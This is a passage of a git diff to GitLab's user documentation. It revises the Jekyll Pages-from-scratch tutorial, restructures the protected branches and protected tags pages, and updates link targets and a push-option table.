a/doc/user/project/new_ci_build_permissions_model.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../../ci/README.md' -remove_date: '2021-06-01' ---- - -This document is deprecated. See the latest [GitLab CI/CD documentation](../../ci/README.md). - -<!-- This redirect file can be deleted after <2021-06-01>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/user/project/pages/getting_started/pages_from_scratch.md b/doc/user/project/pages/getting_started/pages_from_scratch.md index 9f80e2e7613..eb5f3a1bbf0 100644 --- a/doc/user/project/pages/getting_started/pages_from_scratch.md +++ b/doc/user/project/pages/getting_started/pages_from_scratch.md @@ -4,40 +4,54 @@ group: Release info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Create a GitLab Pages website from scratch **(FREE)** +# Tutorial: Create a GitLab Pages website from scratch **(FREE)** -This tutorial shows you how to create a Pages site from scratch. You start with -a blank project and create your own CI file, which gives instruction to -a [runner](https://docs.gitlab.com/runner/). When your CI/CD +This tutorial shows you how to create a Pages site from scratch using +the [Jekyll](https://jekyllrb.com/) Static Site Generator (SSG). You start with +a blank project and create your own CI/CD configuration file, which gives +instructions to a [runner](https://docs.gitlab.com/runner/). When your CI/CD [pipeline](../../../../ci/pipelines/index.md) runs, the Pages site is created. -This example uses the [Jekyll](https://jekyllrb.com/) Static Site Generator (SSG). -Other SSGs follow similar steps. You do not need to be familiar with Jekyll or SSGs +This example uses Jekyll, but other SSGs follow similar steps. +You do not need to be familiar with Jekyll or SSGs to complete this tutorial. +To create a GitLab Pages website: + +- [Step 1: Create the project files](#create-the-project-files) +- [Step 2: Choose a Docker image](#choose-a-docker-image) +- [Step 3: Install Jekyll](#install-jekyll) +- [Step 4: Specify the `public` directory for output](#specify-the-public-directory-for-output) +- [Step 5: Specify the `public` directory for artifacts](#specify-the-public-directory-for-artifacts) +- [Step 6: Deploy and view your website](#deploy-and-view-your-website) + ## Prerequisites -To follow along with this example, start with a blank project in GitLab. -Create three files in the root (top-level) directory. +You must have a [blank project](../../working_with_projects.md#blank-projects) in GitLab. -- `.gitlab-ci.yml` A YAML file that contains the commands you want to run. - For now, leave the file's contents blank. +## Create the project files -- `index.html` An HTML file you can populate with whatever HTML content you'd like, - for example: +Create three files in the root (top-level) directory: - ```html - <html> - <head> - <title>Home</title> - </head> - <body> - <h1>Hello World!</h1> - </body> - </html> - ``` +- `.gitlab-ci.yml`: A YAML file that contains the commands you want to run. + For now, leave the file's contents blank. + +- `index.html`: An HTML file you can populate with whatever HTML content + you'd like, for example: + + ```html + <html> + <head> + <title>Home</title> + </head> + <body> + <h1>Hello World!</h1> + </body> + </html> + ``` + +- [`Gemfile`](https://bundler.io/gemfile.html): A file that describes dependencies for Ruby programs. -- [`Gemfile`](https://bundler.io/gemfile.html) A file that describes dependencies for Ruby programs. Populate it with this content: ```ruby @@ -53,7 +67,7 @@ to run scripts and deploy the site. This specific Ruby image is maintained on [DockerHub](https://hub.docker.com/_/ruby). -Edit your `.gitlab-ci.yml` and add this text as the first line. +Edit your `.gitlab-ci.yml` file and add this text as the first line: ```yaml image: ruby:2.7 @@ -65,13 +79,15 @@ image that contains NodeJS as part of its file system. For example, for a ## Install Jekyll -To run [Jekyll](https://jekyllrb.com/) locally, you would open your terminal and: +To run [Jekyll](https://jekyllrb.com/) locally, you must install it: -- Install [Bundler](https://bundler.io/) by running `gem install bundler`. -- Create `Gemfile.lock` by running `bundle install`. -- Install Jekyll by running `bundle exec jekyll build`. +1. Open your terminal. +1. Install [Bundler](https://bundler.io/) by running `gem install bundler`. +1. Create `Gemfile.lock` by running `bundle install`. +1. Install Jekyll by running `bundle exec jekyll build`. -In the `.gitlab-ci.yml` file, this is written as: +To run Jekyll in your project, edit the `.gitlab-ci.yml` file +and add the installation commands: ```yaml script: @@ -109,7 +125,8 @@ pages: Jekyll needs to know where to generate its output. GitLab Pages only considers files in a directory called `public`. -Jekyll uses destination (`-d`) to specify an output directory for the built website: +Jekyll uses a destination flag (`-d`) to specify an output directory for the built website. +Add the destination to your `.gitlab-ci.yml` file: ```yaml pages: @@ -136,7 +153,7 @@ pages: - public ``` -Paste this into `.gitlab-ci.yml` file, so it now looks like this: +Your `.gitlab-ci.yml` file should now look like this: ```yaml image: ruby:2.7 @@ -151,23 +168,29 @@ pages: - public ``` -Now save and commit the `.gitlab-ci.yml` file. You can watch the pipeline run -by going to **CI/CD > Pipelines**. +## Deploy and view your website -When it succeeds, go to **Settings > Pages** to view the URL where your site -is now available. +After you have completed the preceding steps, +deploy your website: + +1. Save and commit the `.gitlab-ci.yml` file. +1. Go to **CI/CD > Pipelines** to watch the pipeline. +1. When the pipeline succeeds, go to **Settings > Pages** + to view the URL where your site is now available. + +When this `pages` job completes successfully, a special `pages:deploy` job +appears in the pipeline view. It prepares the content of the website for the +GitLab Pages daemon. GitLab runs it in the background and doesn't use a runner. + +## Other options for your CI/CD file If you want to do more advanced tasks, you can update your `.gitlab-ci.yml` file -with [any of the available settings](../../../../ci/yaml/README.md). You can validate +with [any of the available settings](../../../../ci/yaml/index.md). You can validate your `.gitlab-ci.yml` file with the [CI Lint](../../../../ci/lint.md) tool that's included with GitLab. -After successful execution of this `pages` job, a special `pages:deploy` job appears in the -pipeline view. It prepares the content of the website for GitLab Pages daemon. GitLab executes it in -the background and doesn't use runner. - The following topics show other examples of other options you can add to your CI/CD file. -## Deploy specific branches to a Pages site +### Deploy specific branches to a Pages site You may want to deploy to a Pages site only from specific branches. @@ -191,7 +214,8 @@ pages: - public ``` -Then configure the pipeline to run the job for the `master` branch only. +Then configure the pipeline to run the job for the +[default branch](../../repository/branches/default.md) (here, `main`) only. ```yaml image: ruby:2.7 @@ -209,17 +233,17 @@ pages: paths: - public rules: - - if: '$CI_COMMIT_BRANCH == "master"' + - if: '$CI_COMMIT_BRANCH == "main"' ``` -## Specify a stage to deploy +### Specify a stage to deploy There are three default stages for GitLab CI/CD: build, test, and deploy. If you want to test your script and check the built site before deploying to production, you can run the test exactly as it runs when you -push to `master`. +push to your [default branch](../../repository/branches/default.md) (here, `main`). To specify a stage for your job to run in, add a `stage` line to your CI file: @@ -241,11 +265,11 @@ pages: paths: - public rules: - - if: '$CI_COMMIT_BRANCH == "master"' + - if: '$CI_COMMIT_BRANCH == "main"' ``` Now add another job to the CI file, telling it to -test every push to every branch **except** the `master` branch: +test every push to every branch **except** the `main` branch: ```yaml image: ruby:2.7 @@ -264,7 +288,7 @@ pages: paths: - public rules: - - if: '$CI_COMMIT_BRANCH == "master"' + - if: '$CI_COMMIT_BRANCH == "main"' test: stage: test @@ -276,19 +300,19 @@ test: paths: - test rules: - - if: '$CI_COMMIT_BRANCH != "master"' + - if: '$CI_COMMIT_BRANCH != "main"' ``` When the `test` job runs in the `test` stage, Jekyll builds the site in a directory called `test`. The job affects -all branches except `master`. +all branches except `main`. When you apply stages to different jobs, every job in the same stage builds in parallel. If your web application needs more than one test before being deployed, you can run all your tests at the same time. -## Remove duplicate commands +### Remove duplicate commands To avoid duplicating the same scripts in every job, you can add them to a `before_script` section. @@ -317,7 +341,7 @@ pages: paths: - public rules: - - if: '$CI_COMMIT_BRANCH == "master"' + - if: '$CI_COMMIT_BRANCH == "main"' test: stage: test @@ -327,10 +351,10 @@ test: paths: - test rules: - - if: '$CI_COMMIT_BRANCH != "master"' + - if: '$CI_COMMIT_BRANCH != "main"' ``` -## Build faster with cached dependencies +### Build faster with cached dependencies To build faster, you can cache the installation files for your project's dependencies by using the `cache` parameter. @@ -361,7 +385,7 @@ pages: paths: - public rules: - - if: '$CI_COMMIT_BRANCH == "master"' + - if: '$CI_COMMIT_BRANCH == "main"' test: stage: test @@ -371,7 +395,7 @@ test: paths: - test rules: - - if: '$CI_COMMIT_BRANCH != "master"' + - if: '$CI_COMMIT_BRANCH != "main"' ``` In this case, you need to exclude the `/vendor` @@ -386,10 +410,11 @@ exclude: - vendor ``` -Now GitLab CI/CD not only builds the website, -but also pushes with **continuous tests** to feature-branches, -**caches** dependencies installed with Bundler, and -**continuously deploys** every push to the `master` branch. +Now GitLab CI/CD not only builds the website, but also: + +- Pushes with **continuous tests** to feature branches. +- **Caches** dependencies installed with Bundler. +- **Continuously deploys** every push to the `main` branch. ## Related topics diff --git a/doc/user/project/pages/index.md b/doc/user/project/pages/index.md index 1f5e1a6ab45..5a688fbb485 100644 --- a/doc/user/project/pages/index.md +++ b/doc/user/project/pages/index.md @@ -78,7 +78,7 @@ GitLab always deploys your website from a very specific folder called `public` i repository. When you create a new project in GitLab, a [repository](../repository/index.md) becomes available automatically. -To deploy your site, GitLab uses its built-in tool called [GitLab CI/CD](../../../ci/README.md) +To deploy your site, GitLab uses its built-in tool called [GitLab CI/CD](../../../ci/index.md) to build your site and publish it to the GitLab Pages server. The sequence of scripts that GitLab CI/CD runs to accomplish this task is created from a file named `.gitlab-ci.yml`, which you can [create and modify](getting_started/pages_from_scratch.md). diff --git a/doc/user/project/pages/introduction.md b/doc/user/project/pages/introduction.md index 4d6a8653657..94656c91e98 100644 --- a/doc/user/project/pages/introduction.md +++ b/doc/user/project/pages/introduction.md @@ -22,7 +22,7 @@ In brief, this is what you need to upload your website in GitLab Pages: 1. Domain of the instance: domain name that is used for GitLab Pages (ask your administrator). -1. GitLab CI/CD: a `.gitlab-ci.yml` file with a specific job named [`pages`](../../../ci/yaml/README.md#pages) in the root directory of your repository. +1. GitLab CI/CD: a `.gitlab-ci.yml` file with a specific job named [`pages`](../../../ci/yaml/index.md#pages) in the root directory of your repository. 1. A directory called `public` in your site's repository containing the content to be published. 1. GitLab Runner enabled for the project. @@ -129,7 +129,7 @@ See this document for a [step-by-step guide](getting_started/pages_from_scratch. Remember that GitLab Pages are by default branch/tag agnostic and their deployment relies solely on what you specify in `.gitlab-ci.yml`. You can limit -the `pages` job with the [`only` parameter](../../../ci/yaml/README.md#only--except), +the `pages` job with the [`only` parameter](../../../ci/yaml/index.md#only--except), whenever a new commit is pushed to a branch used specifically for your pages. diff --git a/doc/user/project/pages/lets_encrypt_for_gitlab_pages.md b/doc/user/project/pages/lets_encrypt_for_gitlab_pages.md index ce49699785e..978e35b3a9f 100644 --- a/doc/user/project/pages/lets_encrypt_for_gitlab_pages.md +++ b/doc/user/project/pages/lets_encrypt_for_gitlab_pages.md @@ -60,7 +60,7 @@ might be slightly different. Follow the sudo certbot certonly -a manual -d example.com --email your@email.com ``` - Alternatively, you can register without adding an e-mail account, + Alternatively, you can register without adding an email account, but you aren't notified about the certificate expiration's date: ```shell diff --git a/doc/user/project/protected_branches.md b/doc/user/project/protected_branches.md index 4b77236f808..4ff651891b2 100644 --- a/doc/user/project/protected_branches.md +++ b/doc/user/project/protected_branches.md @@ -13,24 +13,24 @@ further restrictions on certain branches, they can be protected. The default branch for your repository is protected by default. -## Who can access a protected branch +## Who can modify a protected branch -When a branch is protected, the default behavior enforces -these restrictions on the branch. +When a branch is protected, the default behavior enforces these restrictions on the branch. -| Action | Who can do it | -|--------------------------|---------------| -| Protect a branch | Maintainers only. | -| Push to the branch | GitLab administrators and anyone with **Allowed** permission. (*) | -| Force push to the branch | No one. | -| Delete the branch | No one. | +| Action | Who can do it | +|:-------------------------|:------------------------------------------------------------------| +| Protect a branch | Maintainers only. | +| Push to the branch | GitLab administrators and anyone with **Allowed** permission. (1) | +| Force push to the branch | No one. | +| Delete the branch | No one. | -(*) Users with developer permissions can create a project in a group, -but might not be allowed to initially push to the [default branch](repository/branches/default.md). +1. Users with the Developer role can create a project in a group, but might not be allowed to + initially push to the [default branch](repository/branches/default.md). -### Set the branch protection default level +### Set the default branch protection level -The default branch protection level is set in the [Admin Area](../admin_area/settings/visibility_and_access_controls.md#default-branch-protection). +Administrators can set a default branch protection level in the +[Admin Area](../admin_area/settings/visibility_and_access_controls.md#default-branch-protection). ## Configure a protected branch @@ -43,140 +43,108 @@ To protect a branch: 1. Go to your project and select **Settings > Repository**. 1. Expand **Protected branches**. 1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to merge** list, select a role, or group that can merge into this branch. In GitLab Premium, you can also add users. +1. From the **Allowed to push** list, select a role, group, or user that can push to this branch. In GitLab Premium, you can also add users. 1. Select **Protect**. -The protected branch displays in the **Protected branches** list. +The protected branch displays in the list of protected branches. -## Using the Allowed to merge and Allowed to push settings +## Configure multiple protected branches by using a wildcard -In GitLab 8.11 and later, we added another layer of branch protection which provides -more granular management of protected branches. The **Developers can push** -option was replaced by **Allowed to push**. You can set this value to allow -or prohibit Maintainers and/or Developers to push to a protected branch. - -Using the **Allowed to push** and **Allowed to merge** settings, you can control -the actions that different roles can perform with the protected branch. -For example, you could set **Allowed to push** to "No one", and **Allowed to merge** -to "Developers + Maintainers", to require everyone to submit a merge request for -changes going into the protected branch. This is compatible with workflows like -the [GitLab workflow](../../topics/gitlab_flow.md). - -However, there are workflows where that is not needed, and only protecting from -force pushes and branch removal is useful. For those workflows, you can allow -everyone with write access to push to a protected branch by setting -**Allowed to push** to "Developers + Maintainers". - -You can set the **Allowed to push** and **Allowed to merge** options while creating -a protected branch or afterwards by selecting the option you want from the -dropdown list in the **Already protected** area. - - - -If you don't choose any of those options while creating a protected branch, -they are set to Maintainers by default. - -### Allow deploy keys to push to a protected branch - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30769) in GitLab 13.7. -> - This feature is being selectively deployed in GitLab.com 13.7, and may not be available for all users. -> - This feature is available for all users in GitLab 13.9. - -You can allow specific machines to access protected branches in your repository with -[deploy keys](deploy_keys/index.md). This can be useful for your CI/CD workflow, -for example. - -Deploy keys can be selected in the **Allowed to push** dropdown when: +Prerequisite: -- Defining a protected branch. -- Updating an existing branch. +- You must have at least the [Maintainer role](../permissions.md). -Select a deploy key to allow the key's owner to push to the chosen protected branch, -even if they aren't a member of the related project. The owner of the selected deploy -key must have at least read access to the given project. +To protect multiple branches at the same time: -For a deploy key to be selectable: +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, type the branch name and a wildcard. + For example: -- It must be [enabled for your project](deploy_keys/index.md#how-to-enable-deploy-keys). -- It must have [write access](deploy_keys/index.md#deploy-keys-permissions) to your project repository. + | Wildcard protected branch | Matching branches | + |---------------------------|--------------------------------------------------------| + | `*-stable` | `production-stable`, `staging-stable` | + | `production/*` | `production/app-server`, `production/load-balancer` | + | `*gitlab*` | `gitlab`, `gitlab/staging`, `master/gitlab/production` | -Deploy keys are not available in the **Allowed to merge** dropdown. +1. From the **Allowed to merge** list, select a role, or group that can merge into this branch. In GitLab Premium, you can also add users. +1. From the **Allowed to push** list, select a role, group, or user that can push to this branch. In GitLab Premium, you can also add users. +1. Select **Protect**. - +The protected branch displays in the list of protected branches. -## Restricting push and merge access to certain users **(PREMIUM)** +## Create a protected branch -With GitLab Premium you can restrict access to protected branches -by choosing a role (Maintainers, Developers) and certain users. From the -dropdown menu select the role and/or the users you want to have merge or push -access. +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53361) in GitLab 11.9. - +Users with the Developer or higher [role](../permissions.md) can create a protected branch. -Click **Protect** and the branch displays in the **Protected branch** list. +Prerequisites: - +- **Allowed to push** is set to **No one** +- **Allowed to merge** is set to **Developers**. -## Wildcard protected branches +You can create a protected branch by using the UI or API only. +This prevents you from accidentally creating a branch +from the command line or from a Git client application. -You can specify a wildcard protected branch, which protects all branches -matching the wildcard. For example: +To create a new branch through the user interface: -| Wildcard Protected Branch | Matching Branches | -|---------------------------|--------------------------------------------------------| -| `*-stable` | `production-stable`, `staging-stable` | -| `production/*` | `production/app-server`, `production/load-balancer` | -| `*gitlab*` | `gitlab`, `gitlab/staging`, `master/gitlab/production` | +1. Go to **Repository > Branches**. +1. Select **New branch**. +1. Fill in the branch name and select an existing branch, tag, or commit to + base the new branch on. Only existing protected branches and commits + that are already in protected branches are accepted. -Protected branch settings, like **Developers can push**, apply to all matching -branches. +## Require everyone to submit merge requests for a protected branch -Two different wildcards can potentially match the same branch. For example, -`*-stable` and `production-*` would both match a `production-stable` branch. -In that case, if _any_ of these protected branches have a setting like -"Allowed to push", then `production-stable` also inherit this setting. +You can force everyone to submit a merge request, rather than allowing them to check in directly +to a protected branch. This is compatible with workflows like the [GitLab workflow](../../topics/gitlab_flow.md). -If you click on a protected branch's name, GitLab displays a list of -all matching branches: +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to merge** list, select **Developers + Maintainers**. +1. From the **Allowed to push** list, select **No one**. +1. Select **Protect**. - +## Allow everyone to push directly to a protected branch -## Create a protected branch +You can allow everyone with write access to push to the protected branch. -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53361) in GitLab 11.9. +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to push** list, select **Developers + Maintainers**. +1. Select **Protect**. -When a protected branch or wildcard protected branches are set to -[**No one** is **Allowed to push**](#using-the-allowed-to-merge-and-allowed-to-push-settings), -Developers (and users with higher [permission levels](../permissions.md)) are -allowed to create a new protected branch as long as they are -[**Allowed to merge**](#using-the-allowed-to-merge-and-allowed-to-push-settings). -This can only be done by using the UI or through the API, to avoid creating protected -branches accidentally from the command line or from a Git client application. +## Allow deploy keys to push to a protected branch -To create a new branch through the user interface: +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30769) in GitLab 13.7. +> - This feature was selectively deployed in GitLab.com 13.7, and may not be available for all users. +> - This feature is available for all users in GitLab 13.9. -1. Go to **Repository > Branches**. -1. Click on **New branch**. -1. Fill in the branch name and select an existing branch, tag, or commit to - base the new branch on. Only existing protected branches and commits - that are already in protected branches are accepted. +You can permit the owner of a [deploy key](deploy_keys/index.md) to push to a protected branch. +The deploy key works, even if the user isn't a member of the related project. However, the owner of the deploy +key must have at least read access to the project. -## Delete a protected branch +Prerequisites: -From time to time, you may need to delete or clean up protected branches. -User with the [Maintainer role](../permissions.md) and greater can manually delete protected -branches by using the GitLab web interface: +- The deploy key must be [enabled for your project](deploy_keys/index.md#how-to-enable-deploy-keys). +- The deploy key must have [write access](deploy_keys/index.md#deploy-keys-permissions) to your project repository. -1. Go to **Repository > Branches**. -1. Click on the delete icon next to the branch you wish to delete. -1. To prevent accidental deletion, an additional confirmation is required. +To allow a deploy key to push to a protected branch: -  +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to push** list, select the deploy key. +1. Select **Protect**. -Deleting a protected branch is allowed only by using the web interface; not from Git. -This means that you can't accidentally delete a protected branch from your -command line or a Git client application. +Deploy keys are not available in the **Allowed to merge** dropdown. -## Allow force push on protected branches +## Allow force push on a protected branch > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15611) in GitLab 13.10 behind a disabled feature flag. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/323431) in GitLab 14.0. @@ -185,68 +153,74 @@ WARNING: This feature might not be available to you. Check the **version history** note above for details. You can allow [force pushes](../../topics/git/git_rebase.md#force-push) to -protected branches by either setting **Allowed to force push** -when you protect a new branch, or by configuring an already-protected branch. +protected branches. -To protect a new branch and enable Force push: +To protect a new branch and enable force push: -1. Navigate to your project's **Settings > Repository**. -1. Expand **Protected branches**, and scroll to **Protect a branch**. -1. Select a **Branch** or wildcard you'd like to protect. -1. Select the user levels **Allowed to merge** and **Allowed to push**. -1. To allow all users with push access to force push, toggle the **Allowed to force push** slider. -1. To reject code pushes that change files listed in the `CODEOWNERS` file, toggle - **Require approval from code owners**. -1. Click **Protect**. +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to push** and **Allowed to merge** lists, select the settings you want. +1. To allow all users with push access to force push, turn on the **Allowed to force push** toggle. +1. To reject code pushes that change files listed in the `CODEOWNERS` file, turn on the + **Require approval from code owners** toggle. +1. Select **Protect**. -To enable force pushes on branches already protected: +To enable force pushes on branches that are already protected: -1. Navigate to your project's **Settings > Repository**. -1. Expand **Protected branches** and scroll to **Protected branch**. -1. Toggle the **Allowed to force push** slider for the chosen branch. +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. In the list of protected branches, next to the branch, turn on the **Allowed to force push** toggle. -When enabled, members who are allowed to push to this branch can also force push. +When enabled, members who are can push to this branch can also force push. -## Protected branches approval by Code Owners **(PREMIUM)** +## Require Code Owner approval on a protected branch **(PREMIUM)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/13251) in GitLab Premium 12.4. +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/13251) in GitLab Premium 12.4. +> - [In](https://gitlab.com/gitlab-org/gitlab/-/issues/35097) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.5 and later, users and groups who can push to protected branches do not have to use a merge request to merge their feature branches. This means they can skip merge request approval rules. -It is possible to require at least one approval by a -[Code Owner](code_owners.md) to a file changed by the -merge request. You can either set Code Owners approvals -at the time you protect a new branch, or set it to a branch -already protected, as described below. +You can require at least one approval by a [Code Owner](code_owners.md) to a file changed by the +merge request. To protect a new branch and enable Code Owner's approval: -1. Navigate to your project's **Settings > Repository** and expand **Protected branches**. -1. Scroll down to **Protect a branch**, select a **Branch** or wildcard you'd like to protect, select who's **Allowed to merge** and **Allowed to push**, and toggle the **Require approval from code owners** slider. -1. Click **Protect**. +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. From the **Branch** dropdown menu, select the branch you want to protect. +1. From the **Allowed to push** and **Allowed to merge** lists, select the settings you want. +1. Turn on the **Require approval from code owners** toggle. +1. Select **Protect**. -To enable Code Owner's approval to branches already protected: +To enable Code Owner's approval on branches that are already protected: -1. Navigate to your project's **Settings > Repository** and expand **Protected branches**. -1. Scroll down to **Protected branch** and toggle the **Code owner approval** slider for the chosen branch. +1. Go to your project and select **Settings > Repository**. +1. Expand **Protected branches**. +1. In the list of protected branches, next to the branch, turn on the **Code owner approval** toggle. -When enabled, all merge requests targeting these branches require approval +When enabled, all merge requests for these branches require approval by a Code Owner per matched rule before they can be merged. Additionally, direct pushes to the protected branch are denied if a rule is matched. -[Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35097) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.5, users and groups who are allowed to push to protected branches do not require a merge request to merge their feature branches. Thus, they can skip merge request approval rules. +## Run pipelines on protected branches -## Running pipelines on protected branches - -The permission to merge or push to protected branches is used to define if a user can -run CI/CD pipelines and execute actions on jobs that are related to those branches. +The permission to merge or push to protected branches defines +whether or not a user can run CI/CD pipelines and execute actions on jobs. See [Security on protected branches](../../ci/pipelines/index.md#pipeline-security-on-protected-branches) for details about the pipelines security model. -## Changelog +## Delete a protected branch + +Users with the [Maintainer role](../permissions.md) and greater can manually delete protected +branches by using the GitLab web interface: + +1. Go to **Repository > Branches**. +1. Next to the branch you want to delete, select the **Delete** button (**{remove}**). +1. On the confirmation dialog, type the branch name and select **Delete protected branch**. -- **13.5**: [Allow Deploy keys to push to protected branches once more](https://gitlab.com/gitlab-org/gitlab/-/issues/30769). -- **11.9**: [Allow protected branches to be created](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53361) - by Developers (and users with higher permission levels) through the API and the user interface. +You can delete a protected branch from the UI only. +This prevents you from accidentally deleting a branch +from the command line or from a Git client application. <!-- ## Troubleshooting diff --git a/doc/user/project/protected_tags.md b/doc/user/project/protected_tags.md index 17a9cd5c8c6..b4e13aebdb2 100644 --- a/doc/user/project/protected_tags.md +++ b/doc/user/project/protected_tags.md @@ -9,15 +9,24 @@ type: reference, howto > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/10356) in GitLab 9.1. -Protected tags allow control over who has permission to create tags as well as preventing accidental update or deletion once created. Each rule allows you to match either an individual tag name, or use wildcards to control multiple tags at once. +Protected tags: + +- Allow control over who has permission to create tags. +- Prevent accidental update or deletion once created. + +Each rule allows you to match either: + +- An individual tag name. +- Wildcards to control multiple tags at once. This feature evolved out of [protected branches](protected_branches.md) -## Overview +## Who can modify a protected tag + +By default: -Protected tags prevent anyone from updating or deleting the tag, and prevent -creation of matching tags based on the permissions you have selected. By default, -anyone without Maintainer [permissions](../permissions.md) is prevented from creating tags. +- To create tags, you must have the [Maintainer role](../permissions.md). +- No one can update or delete tags. ## Configuring protected tags diff --git a/doc/user/project/push_options.md b/doc/user/project/push_options.md index 728c682b009..c17133e72cf 100644 --- a/doc/user/project/push_options.md +++ b/doc/user/project/push_options.md @@ -39,7 +39,7 @@ You can use push options to skip a CI/CD pipeline, or pass CI/CD variables. | Push option | Description | Introduced in version | | ------------------------------ | ------------------------------------------------------------------------------------------- |---------------------- | | `ci.skip` | Do not create a CI pipeline for the latest push. | [11.7](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/15643) | -| `ci.variable="<name>=<value>"` | Provide [CI/CD variables](../../ci/variables/README.md) to be used in a CI pipeline, if one is created due to the push. | [12.6](https://gitlab.com/gitlab-org/gitlab/-/issues/27983) | +| `ci.variable="<name>=<value>"` | Provide [CI/CD variables](../../ci/variables/index.md) to be used in a CI pipeline, if one is created due to the push. | [12.6](https://gitlab.com/gitlab-org/gitlab/-/issues/27983) | An example of using `ci.skip`: @@ -66,6 +66,7 @@ time as pushing changes: | `merge_request.remove_source_branch` | Set the merge request to remove the source branch when it's merged. | [12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/64320) | | `merge_request.title="<title>"` | Set the title of the merge request. Ex: `git push -o merge_request.title="The title I want"`. | [12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/64320) | | `merge_request.description="<description>"` | Set the description of the merge request. Ex: `git push -o merge_request.description="The description I want"`. | [12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/64320) | +| `merge_request.milestone="<milestone>"` | Set the milestone of the merge request. Ex: `git push -o merge_request.milestone="3.0"`. | [14.1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/63960) | | `merge_request.label="<label>"` | Add labels to the merge request. If the label does not exist, it is created. For example, for two labels: `git push -o merge_request.label="label1" -o merge_request.label="label2"`. | [12.3](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/31831) | | `merge_request.unlabel="<label>"` | Remove labels from the merge request. For example, for two labels: `git push -o merge_request.unlabel="label1" -o merge_request.unlabel="label2"`. | [12.3](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/31831) | | `merge_request.assign="<user>"` | Assign users to the merge request. For example, for two users: `git push -o merge_request.assign="user1" -o merge_request.assign="user2"`. | [13.10](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/25904) | diff --git a/doc/user/project/quick_actions.md b/doc/user/project/quick_actions.md index 45cb5e74d6c..d8d464ce6d8 100644 --- a/doc/user/project/quick_actions.md +++ b/doc/user/project/quick_actions.md @@ -69,11 +69,11 @@ threads. Some quick actions might not be available to all subscription tiers. | `/duplicate <#issue>` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Close this issue and mark as a duplicate of another issue. **(FREE)** Also, mark both as related. | | `/epic <epic>` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Add to epic `<epic>`. The `<epic>` value should be in the format of `&epic`, `group&epic`, or a URL to an epic. | | `/estimate <time>` | **{check-circle}** Yes | **{check-circle}** Yes | **{dotted-circle}** No | Set time estimate. For example, `/estimate 1mo 2w 3d 4h 5m`. Learn more about [time tracking](time_tracking.md). | -| `/invite_email email1 email2` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Add up to six email participants. This action is behind feature flag `issue_email_participants`. | +| `/invite_email email1 email2` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Add up to six email participants. This action is behind feature flag `issue_email_participants` and is not yet supported in issue templates. | | `/iteration *iteration:"iteration name"` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Set iteration. For example, to set the `Late in July` iteration: `/iteration *iteration:"Late in July"` ([introduced in GitLab 13.1](https://gitlab.com/gitlab-org/gitlab/-/issues/196795)). | | `/label ~label1 ~label2` | **{check-circle}** Yes | **{check-circle}** Yes | **{check-circle}** Yes | Add one or more labels. Label names can also start without a tilde (`~`), but mixed syntax is not supported. | | `/lock` | **{check-circle}** Yes | **{check-circle}** Yes | **{dotted-circle}** No | Lock the discussions. | -| `/merge` | **{dotted-circle}** No | **{check-circle}** Yes | **{dotted-circle}** No | Merge changes. Depending on the project setting, this may be [when the pipeline succeeds](merge_requests/merge_when_pipeline_succeeds.md), or adding to a [Merge Train](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). | +| `/merge` | **{dotted-circle}** No | **{check-circle}** Yes | **{dotted-circle}** No | Merge changes. Depending on the project setting, this may be [when the pipeline succeeds](merge_requests/merge_when_pipeline_succeeds.md), or adding to a [Merge Train](../../ci/pipelines/merge_trains.md). | | `/milestone %milestone` | **{check-circle}** Yes | **{check-circle}** Yes | **{dotted-circle}** No | Set milestone. | | `/move <path/to/project>` | **{check-circle}** Yes | **{dotted-circle}** No | **{dotted-circle}** No | Move this issue to another project. | | `/parent_epic <epic>` | **{dotted-circle}** No | **{dotted-circle}** No | **{check-circle}** Yes | Set parent epic to `<epic>`. The `<epic>` value should be in the format of `&epic`, `group&epic`, or a URL to an epic ([introduced in GitLab 12.1](https://gitlab.com/gitlab-org/gitlab/-/issues/10556)). | diff --git 